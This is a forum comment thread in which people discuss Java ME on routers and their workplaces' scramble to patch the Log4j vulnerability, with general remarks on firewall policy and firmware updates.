I don’t know how popular it is but Java ME came out something like 20 years ago and could run on devices like pagers and pocket dictionaries, just fine. I would assume that modern routers are at or above that level of hardware by this point.
Ultimately, there aren’t that many people who can code C and C++ at all, let alone write optimal C/C++ code. It’s cheaper and easier for most companies to have one or two low-level engineers who get the platform running, and put ME on top of it. After that’s done, you can hand it over to some 18 year old that can barely implement fizz-buzz, and let him code whatever all else the business wants in Java.
Java ME is what I was talking about with the cell phones. I guess that makes sense.
But the hardware I’ve had definitely seems underpowered. The webserver for one would timeout like crazy if the router was doing anything else. And, as I said, the new one is just incredibly slow. It just seems to me like it would make more sense to use “off the shelf” open source web severs that were already built in lower level languages.
Lots of scrambling at work – luckily none of the code I am responsible for uses log4j. One of the pieces is on top of something that uses log4j, but not the vulnerable version.
I now have customers yelling about Azure services being vulnerable even though both Microsoft and Databricks say the aren’t vulnerable and being PaaS, we have no ability to remediate or even confirm if Log4J is in the underlying distro. Microsoft has a very small list of potentially vulnerable services, but not with the clients in question.
Multiple internal tools that my company uses were found to have vulnerabilities from Log4j, but fortunately the application I directly work on is not one of them. However, the repository that holds my team’s code, as well as another platform that hosts our compiled code modules and other libraries our code depends upon, were found to be affected, and other teams are actively working on patching them as we speak.
That’s mostly correct. It’s just the internet facing systems that use Java and this library are most immediately susceptible to attack…
But really any java based application using the library has a severe chink in their armor…which could extend to anything else on a machine, if it were compromised, and the attacker elevated their privilege on that machine. Logging is a pretty common requirement for applications.
For us, it’s been a week of patching…only to get another email from a vendor saying ‘the first remediation may not be quite enough.’
67+ applications based on 27 or so internal libraries all impacted - plus about 15 or so purchased and installed applications (including ESRI ArcGIS Enterprise). Senior programmers working insane hours since last Friday, emergency deployments, etc.
Our frigging kickstarter had Log4j included. That has now been remediated.
Yeah, it’s a big deal. The best analogy I’ve seen is that someone gives your housekeeper a big sealed box. They bring the box into your house and open it with no clue what’s inside.
I just saw some logs from a customer where the log4j attack was being thrown at sshd in the hopes that sshd was logging via log4j (it wasn’t).
This is just another instance of not correctly handling uncontrolled data, but it also illustrates how poorly many sites manage network security - there should be no reason for a webserver inside your network to be allowed to make arbitrary ldap connections to the internet, and not having a robust firewall policy to prevent that is negligent, in my opinion.
The easiest way to check/test is to log into your router, go to the admin page and check for firmware upgrades. If there is one, install it. That would be your solution if your router were vulnerable and staying current with firmware is generally considered a best practices operation in any event.
ETA: We got an FYSA email last week that several hundred servers/apps were patched and monitoring is ongoing for anything that was overlooked. Not within my scope of responsibilities so no details. Just reassuring me so I can reassure anyone who asks.